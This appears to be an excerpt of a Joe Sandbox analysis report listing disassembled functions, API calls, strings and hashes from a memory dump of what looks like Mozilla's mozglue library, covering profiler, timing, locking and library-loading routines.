InitOnceExecuteOnce.KERNEL32(6C6DF818,6C65F240,?,?), ref: 6C664612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C664636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C664644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C66466D
VerSetConditionMask.NTDLL ref: 6C66469F
VerSetConditionMask.NTDLL ref: 6C6646AB
VerSetConditionMask.NTDLL ref: 6C6646B2
VerSetConditionMask.NTDLL ref: 6C6646B9
VerSetConditionMask.NTDLL ref: 6C6646C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6646CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C6646F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6646FD

Strings

Gml, xrefs: 6C6644FC
user32.dll, xrefs: 6C664557, 6C66463F
kernel32.dll, xrefs: 6C6644CD
l, xrefs: 6C664578
NativeNtBlockSet_Write, xrefs: 6C6646F7
WRusr.dll, xrefs: 6C6644B5

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gml$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-884719140
Opcode ID: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction ID: eab5048da82757be091df25168019b24db7482201df077dfba6ea1edc53506d4
Opcode Fuzzy Hash: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction Fuzzy Hash: AE6106B0604244AFEB00DF63D895BA57BB8EF86348F04C458E5049BA41D7F1AA85CF9F

Function 6C69F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C69F8F9

Part of subcall function 6C666390: GetCurrentThreadId.KERNEL32 ref: 6C6663D0
Part of subcall function 6C666390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6663DF
Part of subcall function 6C666390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C66640E

ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F93A
GetCurrentThreadId.KERNEL32 ref: 6C69F98A
GetCurrentThreadId.KERNEL32 ref: 6C69F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F716

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

Part of subcall function 6C65B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C65B5E0

GetCurrentThreadId.KERNEL32 ref: 6C69F739
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F746
GetCurrentThreadId.KERNEL32 ref: 6C69F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6D385B,00000002,?,?,?,?,?), ref: 6C69F829
free.MOZGLUE(?,?,00000000,?), ref: 6C69F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C69F866
free.MOZGLUE(?), ref: 6C69FA0C

Part of subcall function 6C665E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C665E8C
Part of subcall function 6C665E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665E9D
Part of subcall function 6C665E60: GetCurrentThreadId.KERNEL32 ref: 6C665EAB
Part of subcall function 6C665E60: GetCurrentThreadId.KERNEL32 ref: 6C665EB8
Part of subcall function 6C665E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665ECF
Part of subcall function 6C665E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C665F27
Part of subcall function 6C665E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C665F47
Part of subcall function 6C665E60: GetCurrentProcess.KERNEL32 ref: 6C665F53
Part of subcall function 6C665E60: GetCurrentThread.KERNEL32 ref: 6C665F5C
Part of subcall function 6C665E60: GetCurrentProcess.KERNEL32 ref: 6C665F66
Part of subcall function 6C665E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C665F7E

free.MOZGLUE(?), ref: 6C69F9C5
free.MOZGLUE(?), ref: 6C69F9DA

Strings

Thread , xrefs: 6C69F789
[D %d/%d] profiler_register_thread(%s), xrefs: 6C69F71F
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C69F9A6
" attempted to re-register as ", xrefs: 6C69F858

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: b1212e13894a61565bf873e0a71522ff3f24380dbdd5ad14f6d00f76d55e6a09
Instruction ID: ac30982e706685506d0b69bd6c31d6219e903b9dfed3c3e8203c429b5339d853
Opcode Fuzzy Hash: b1212e13894a61565bf873e0a71522ff3f24380dbdd5ad14f6d00f76d55e6a09
Instruction Fuzzy Hash: 908106716042019FDB10DF25C880AAEB7B5EFC6308F55456DE8499BB51EB30E849CBAF

Function 6C69EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69EE60
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EE6D
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C69EEA5
CloseHandle.KERNEL32(?), ref: 6C69EEB4
free.MOZGLUE(00000000), ref: 6C69EEBB
GetCurrentThreadId.KERNEL32 ref: 6C69EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69EECF

Part of subcall function 6C69DE60: GetCurrentThreadId.KERNEL32 ref: 6C69DE73
Part of subcall function 6C69DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C664A68), ref: 6C69DE7B
Part of subcall function 6C69DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C664A68), ref: 6C69DEB8
Part of subcall function 6C69DE60: free.MOZGLUE(00000000,?,6C664A68), ref: 6C69DEFE
Part of subcall function 6C69DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C69DF38

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

GetCurrentThreadId.KERNEL32 ref: 6C69EF1E
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EF2B
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EF59
GetCurrentThreadId.KERNEL32 ref: 6C69EFB0
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EFBD
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EFE1
GetCurrentThreadId.KERNEL32 ref: 6C69EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F000

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C69F02F

Part of subcall function 6C69F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C69F09B
Part of subcall function 6C69F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C69F0AC
Part of subcall function 6C69F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C69F0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C69F008
[I %d/%d] profiler_stop, xrefs: 6C69EED7

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 50cf38773bf96c03438fd58e1a0dbcecab98bc745bc5edc233a6154d42347645
Instruction ID: 54bae6752647e8a262a5c2443303edca6c75c1bed4f4c2427930dd117207f867
Opcode Fuzzy Hash: 50cf38773bf96c03438fd58e1a0dbcecab98bc745bc5edc233a6154d42347645
Instruction Fuzzy Hash: EC5126316002129FDB005F66D8887A97BB4FF8B36DF14456AE91683B42DB747805CBAF

Function 6C665E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665E9D

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

GetCurrentThreadId.KERNEL32 ref: 6C665EAB
GetCurrentThreadId.KERNEL32 ref: 6C665EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C666017

Part of subcall function 6C654310: moz_xmalloc.MOZGLUE(00000010,?,6C6542D2), ref: 6C65436A
Part of subcall function 6C654310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6542D2), ref: 6C654387

moz_xmalloc.MOZGLUE(00000004), ref: 6C665F47
GetCurrentProcess.KERNEL32 ref: 6C665F53
GetCurrentThread.KERNEL32 ref: 6C665F5C
GetCurrentProcess.KERNEL32 ref: 6C665F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C665F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C665F27

Part of subcall function 6C66CA10: mozalloc_abort.MOZGLUE(?), ref: 6C66CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C665E8C

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C66605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C6660CC

Strings

GeckoMain, xrefs: 6C665ECE, 6C666015

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 211275ea6b9994ee602de484c5dd006bb7ae7fee4f0c774230fc7d995417a863
Instruction ID: 2cd89fd41bcb337c7bb41e7ff879147b1e396609699be3e1535cb98365efdae5
Opcode Fuzzy Hash: 211275ea6b9994ee602de484c5dd006bb7ae7fee4f0c774230fc7d995417a863
Instruction Fuzzy Hash: 6371BFB06047409FD710DF2AD480A6ABBF0FF8A304F54496DE58687F52D731E948CB9A

Function 6C669590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6531C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C653217
Part of subcall function 6C6531C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C653236
Part of subcall function 6C6531C0: FreeLibrary.KERNEL32 ref: 6C65324B
Part of subcall function 6C6531C0: __Init_thread_footer.LIBCMT ref: 6C653260
Part of subcall function 6C6531C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C65327F
Part of subcall function 6C6531C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65328E
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6532AB
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6532D1
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6532E5
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6532F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C669675
__Init_thread_footer.LIBCMT ref: 6C669697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6696E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C669707
__Init_thread_footer.LIBCMT ref: 6C66971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6697B7
FreeLibrary.KERNEL32 ref: 6C6697D0
FreeLibrary.KERNEL32 ref: 6C6697EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669824

Strings

NtMapViewOfSection, xrefs: 6C669701
ntdll.dll, xrefs: 6C6696E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C669670
MapViewOfFileNuma2, xrefs: 6C6697B1

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: fd55bb060ca324fad644d0592b8733138f23f4a485bfe4bfee0cdb20c0154ef6
Instruction ID: 99e33e289692ab79beea46c92a1b769f038b8cec121decf90c14e6842b775f47
Opcode Fuzzy Hash: fd55bb060ca324fad644d0592b8733138f23f4a485bfe4bfee0cdb20c0154ef6
Instruction Fuzzy Hash: AF61B0716002069BDF008F67E8D4BDA7BB1EB8A358F118529ED1597B80D770B854CBAF

Function 6C6B6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6694
GetThreadId.KERNEL32(?), ref: 6C6B66B1
GetCurrentThreadId.KERNEL32 ref: 6C6B66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6B66E1
EnterCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6734
GetCurrentProcess.KERNEL32 ref: 6C6B673A
LeaveCriticalSection.KERNEL32(6C6DF618), ref: 6C6B676C
GetCurrentThread.KERNEL32 ref: 6C6B67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C6B6868
RtlCaptureContext.NTDLL ref: 6C6B687F

Strings

WalkStack64, xrefs: 6C6B6890

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: e7da402c09b6af611a02b9743e00f820c7f47792369de1c6150b12d6e61423fe
Instruction ID: 046c4d9724e0885745c9a256f4235ce348d1688609555383b529b970b5b0e2ec
Opcode Fuzzy Hash: e7da402c09b6af611a02b9743e00f820c7f47792369de1c6150b12d6e61423fe
Instruction Fuzzy Hash: 1151ED71A09301AFDB15CF25C884B9ABBF4FF89714F00492DF999A7640D770E918CB9A

Function 6C69DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69DE73
GetCurrentThreadId.KERNEL32 ref: 6C69DF7D
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69DF8A
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69DFC9
GetCurrentThreadId.KERNEL32 ref: 6C69DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C664A68), ref: 6C69DE7B

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C664A68), ref: 6C69DEB8
free.MOZGLUE(00000000,?,6C664A68), ref: 6C69DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C69DF38

Strings

<none>, xrefs: 6C69DFD7
[I %d/%d] locked_profiler_stop, xrefs: 6C69DE83
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C69E00E

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 2fcca3c07977d64dd4993d632918e94227168705532684585624f7cb7a8fc6a2
Instruction ID: 601b910b7b33fabe0a9ab561ffd34791e6424384c40c8e5f7151f0789e36a508
Opcode Fuzzy Hash: 2fcca3c07977d64dd4993d632918e94227168705532684585624f7cb7a8fc6a2
Instruction Fuzzy Hash: BC41D6357011129BDB109F66D8447AE7775EF8631DF144025E90A97B42CB71B806CBEF

Function 6C6AD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6AD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD52A
GetCurrentThreadId.KERNEL32 ref: 6C6AD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD55F
free.MOZGLUE(00000000), ref: 6C6AD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6AD5D3
GetCurrentThreadId.KERNEL32 ref: 6C6AD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD652
GetCurrentThreadId.KERNEL32 ref: 6C6AD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD6A2

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction ID: 9b8953e07197604a31493b0d65dd3307c99482accd72b78eb2f8161ceeed3414
Opcode Fuzzy Hash: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction Fuzzy Hash: EE516C71604705DFC704DF65C484A9ABBF4FF8A358F108A2EE95A87710DB30B945CB99

Function 6C675670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6756D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6756E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6756F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C675744
